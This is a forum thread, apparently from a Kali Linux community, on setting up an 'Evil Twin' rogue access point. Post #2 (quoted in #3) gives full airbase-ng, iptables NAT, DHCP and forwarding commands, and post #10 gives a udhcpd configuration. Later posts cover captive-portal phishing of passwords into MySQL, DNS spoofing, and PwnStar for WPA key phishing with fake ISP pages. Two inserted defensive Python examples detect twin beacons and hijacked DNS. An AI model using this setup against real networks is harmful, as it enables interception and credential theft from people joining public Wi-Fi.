
Thread: How to make an Evil Twin AP in Kali.

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    How to make an Evil Twin AP in Kali.

    Hey guys. I've been looking into the Evil Twin method but haven't been able to get the DHCP3 server running. I can, however, get the fake AP running and a MySQL database + server running, but I need help with running the DHCP3 server. Can anyone provide instructions? (along with IP flushing and forwarding, etc). Thanks!

  2. #2
    Join Date
    2013-Mar
    Location
    http://rastamouse.me
    Posts
    86
    When I've done it, this is how:

    Commands
    Code:
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/dhcp3/dhcpd.conf
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 10.0.0.255;
        option routers 10.0.0.254;
        option domain-name-servers 8.8.8.8;
        range 10.0.0.1 10.0.0.140;
    }
    iptables-flush.sh
    Code:
    #!/bin/bash
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
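
Added example, not part of the thread: the setup above advertises a chosen ESSID on channel 11 from the attacker's own radio, which is what a wireless survey can compare against an inventory of sanctioned access points. The SSID `CorpNet`, the BSSIDs and the survey rows are constructed, and showing the twin as an open network is an assumption.

```python
# Added example: flag likely evil-twin beacons in a Wi-Fi survey.
# All SSIDs, BSSIDs and survey rows below are constructed sample data.
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str      # "OPEN", "WPA2", ...
    signal_dbm: int

# Inventory of sanctioned access points (hypothetical values).
KNOWN_APS = {
    "CorpNet": {
        "bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
        "security": "WPA2",
        "channels": {1, 6},
    },
}

def find_evil_twins(beacons, known=KNOWN_APS):
    """Return (beacon, reasons) for beacons that reuse a sanctioned SSID
    but do not match the inventory entry for it."""
    findings = []
    for b in beacons:
        profile = known.get(b.ssid)
        if profile is None:
            continue  # not one of our SSIDs, out of scope here
        reasons = []
        if b.bssid.lower() not in profile["bssids"]:
            reasons.append("unknown BSSID")
        if b.security != profile["security"]:
            reasons.append(f"security {b.security}, expected {profile['security']}")
        if b.channel not in profile["channels"]:
            reasons.append(f"unexpected channel {b.channel}")
        if reasons:
            findings.append((b, reasons))
    return findings

SURVEY = [
    Beacon("CorpNet", "aa:bb:cc:00:00:01", 1, "WPA2", -48),
    Beacon("CorpNet", "AA:BB:CC:00:00:02", 6, "WPA2", -61),
    Beacon("CorpNet", "00:11:22:33:44:55", 11, "OPEN", -35),   # twin-like row
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 11, "OPEN", -70),
]

if __name__ == "__main__":
    for beacon, reasons in find_evil_twins(SURVEY):
        print(beacon.bssid, beacon.ssid, "; ".join(reasons))
```

A BSSID can be cloned, so the security and channel checks matter as much as the BSSID allowlist.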

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by rastamouse View Post
    When I've done it, this is how:

    Commands
    Code:
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward
    /etc/dhcp3/dhcpd.conf
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 10.0.0.255;
        option routers 10.0.0.254;
        option domain-name-servers 8.8.8.8;
        range 10.0.0.1 10.0.0.140;
    }
    iptables-flush.sh
    Code:
    #!/bin/bash
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    Ok. Are you using isc dhcp server?

  4. #4
    Join Date
    2013-Dec
    Posts
    1

    How to make an Evil Twin AP in Kali.

    Quote Originally Posted by soxrok2212 View Post
    Ok. Are you using isc dhcp server?
    I use the same system as Debian Kali and have a problem with dhcp3-server (installed version isc-dhcp-server); I need help with dhcpd.conf and the codes, please.

  5. #5
    Join Date
    2013-Dec
    Posts
    3
    When I try to run this I get these errors: (copied directly from terminal)

    root@kali:~# ifconfig at0 10.0.0.254 netmask 255.255.255.0
    root@kali:~# ifconfig at0 up
    root@kali:~# ifconfig eth0 up && dhclient3 eth0
    bash: dhclient3: command not found
    root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    root@kali:~# ./iptables-flush.sh
    bash: ./iptables-flush.sh: No such file or directory
    root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    root@kali:~# dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    bash: dhcpd3: command not found
    root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

    I am running Kali live off of a USB. Why am I getting the "bash" responses?

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by tolle250 View Post
    I am running Kali live off of a USB. Why am I getting the "bash" responses?
    Because those are not commands; you have to edit a DHCP file in the system.

  7. #7
    Join Date
    2014-Jan
    Posts
    1
    Here is a detailed tutorial on how you can efficiently implement a man-in-the-middle attack using Evil Twins.

  8. #8
    Join Date
    2013-Mar
    Posts
    65
    The proper dhcp server for Kali is isc-dhcp-server

    If you want a quick and easy way, you can install easy-creds.

  9. #9
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by soxrok2212 View Post
    Hey guys. I've been looking into the Evil Twin method but haven't been able to get the DHCP3 server running. I can, however, get the fake AP running and a MySQL database + server running, but I need help with running the DHCP3 server. Can anyone provide instructions? (along with IP flushing and forwarding, etc). Thanks!
    hi :-)
    if this can possibly be of help to someone:
    I made some proofs on my kali-1.07 (VM):

    http://vimeo.com/101170619
    http://vimeo.com/101133726

    sorry for quality && errors!
    bye
    Last edited by zimmaro; 2014-07-19 at 20:12.

  10. #10
    Join Date
    2014-Jun
    Location
    Greece
    Posts
    133
    A lightweight alternative to isc-dhcp-server is udhcpd

    Code:
    apt-get install udhcpd
    enable it:

    Code:
    sed 's%DHCPD_ENABLED="no"%DHCPD_ENABLED="yes"%g' /etc/default/udhcpd > /etc/default/udhcpd1 && mv /etc/default/udhcpd1 /etc/default/udhcpd
    create a config file:
    Code:
    cat > /etc/udhcpd.conf << EOF
    start			192.168.60.130
    end			192.168.60.140
    interface		"put here your interface to listen to, without quotes"
    lease_file		/var/lib/misc/udhcpd.leases
    pidfile			/var/run/udhcpd.pid
    option	subnet		255.255.255.128
    opt	router		192.168.60.129
    opt	broadcast	192.168.60.255
    option	dns		"put here your DNS server(s) without quotes and commas"
    option	domain		local
    option	lease		864000
    EOF
    and start it:
    Code:
    /etc/init.d/udhcpd start
    Security always begins with personal responsibility. - quietman7

  11. #11
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    Hello, I'm trying to create an evil twin AP both via command line and via scripts (e.g. PwnStar). Both ways work, but I always have 2 problems:
    1- The redirect to the fake portal page happens only on short-named sites: www.google.com, www.facebook.com and so on. Longer names or subpages simply give a timeout error or a page unavailable error.
    2- Using an Android/iOS device I get no notification of the data required to access the internet (I'm using a captive portal page that requires a username and pass), so using a smartphone I simply connect to the AP and have no access to the internet. The fake page is displayed only if I use the phone browser and access the sites I mentioned in point 1. Connecting to a normal hotspot, or an AP in McDonald's, airports and so on always prompts a popup that leads the user to the credential page... Is it possible to implement something similar on a rogue AP?

    Could you help me? Thanks in advance.
    Last edited by forumkali@yopmail.com; 2014-07-25 at 11:11.

  12. #12
    Join Date
    2013-Jul
    Posts
    841
    We suggest you use Pwnstar 9.0. The ability of clients to call up your rogueAP web page is increased if you provide internet access when using PwnStar 9.0. Read thru the threads concerning PwnStar. The author (not our team) has within the last few months issued an update - the download link is in the threads. You can easily rewrite the web pages to meet your requirements. We use the program primarily in WPA Phishing but we have written router web pages to mimic internet service providers.
    Musket Teams

  13. #13
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    Quote Originally Posted by mmusket33 View Post
    We suggest you use Pwnstar 9.0. The ability of clients to call up your rogueAP web page is increased if you provide internet access when using PwnStar 9.0. Read thru the threads concerning PwnStar. The author (not our team) has within the last few months issued an update - the download link is in the threads. You can easily rewrite the web pages to meet your requirements. We use the program primarily in WPA Phishing but we have written router web pages to mimic internet service providers.
    Musket Teams
    Hello, I'm using PwnStar 9.0 by vulpi and your version too, but I always have the same issues.

  14. #14
    Join Date
    2013-Dec
    Posts
    3
    Is it possible? ... Evil twin in offline mode, i.e. without an internet connection, with DNS spoof?
    I have tried but I think my iptables rules are incorrect.
    Everything is working well but the victim PC won't get redirected!
    So, any solution?

  15. #15
    Hello, I successfully set up an evil twin, but I'm not getting any input in MySQL. The target is myself. On my laptop I get redirected to the fake AP page and I enter a password, but when I check the MySQL database I get Empty set (0.00 sec).
    Please help.

  16. #16
    Join Date
    2013-Mar
    Location
    http://rastamouse.me
    Posts
    86
    If you haven't got an Internet connection, where are you redirecting them to...? Just a page on your local web server? That is possible, you would just need your DNS Spoof to return your local IP for every DNS request.
    OSCP
    --
    If it smells like a duck, walks like a duck and quacks like a duck; then it probably is a duck.
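
Added example, not part of the thread: a resolver that returns one local IP for every DNS request, as described in this post, can be recognised from the client side by comparing answers for unrelated names and for a canary name that must not exist. The hostnames, the canary label and all answers are constructed; the 192.0.2.x, 198.51.100.x and 203.0.113.x documentation addresses stand in for normal public answers.

```python
# Added example: recognise a resolver that answers every name with one address.
# Hostnames, canary label and answers below are constructed sample data.
import ipaddress

# RFC 1918, loopback and link-local ranges, listed explicitly.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

def is_local(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)

def assess_resolver(answers, canary):
    """answers maps hostname -> list of A records (empty list = NXDOMAIN).
    canary is a name that must not exist, e.g. a random label under .invalid."""
    findings = []
    if answers.get(canary):
        findings.append("canary name resolved: resolver fabricates answers")
    real = {h: set(a) for h, a in answers.items() if h != canary and a}
    distinct = set().union(*real.values()) if real else set()
    if len(real) >= 2 and len(distinct) == 1:
        addr = next(iter(distinct))
        where = "local" if is_local(addr) else "public"
        findings.append(f"all {len(real)} names resolve to one {where} address {addr}")
    local_hits = sorted(h for h, a in real.items() if all(is_local(x) for x in a))
    if local_hits and len(distinct) > 1:
        findings.append("public names with only local answers: " + ", ".join(local_hits))
    return findings

CANARY = "k3q9x7.invalid"
HIJACKED = {
    "www.example.com": ["10.0.0.254"],
    "www.example.org": ["10.0.0.254"],
    "mail.example.net": ["10.0.0.254"],
    CANARY: ["10.0.0.254"],
}
NORMAL = {
    "www.example.com": ["192.0.2.10"],
    "www.example.org": ["198.51.100.7"],
    "mail.example.net": ["203.0.113.5"],
    CANARY: [],
}

if __name__ == "__main__":
    for label, data in (("hijacked", HIJACKED), ("normal", NORMAL)):
        print(label, assess_resolver(data, CANARY))
```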

  17. #17
    Join Date
    2013-Jul
    Posts
    841
    To: forumkali-yopmail-com

    Read thru the pwnstar thread started by Vulpi. MTeams provides a step by step method to alter your Apache2 to accept https requests.

    To: rastamouse

    If you are not providing internet access then you would be phishing to obtain a log in password or WPA Keys. Pwnstar 9 allows this. You can rewrite the internet pages to mimic the type of page you require.

    MTeams
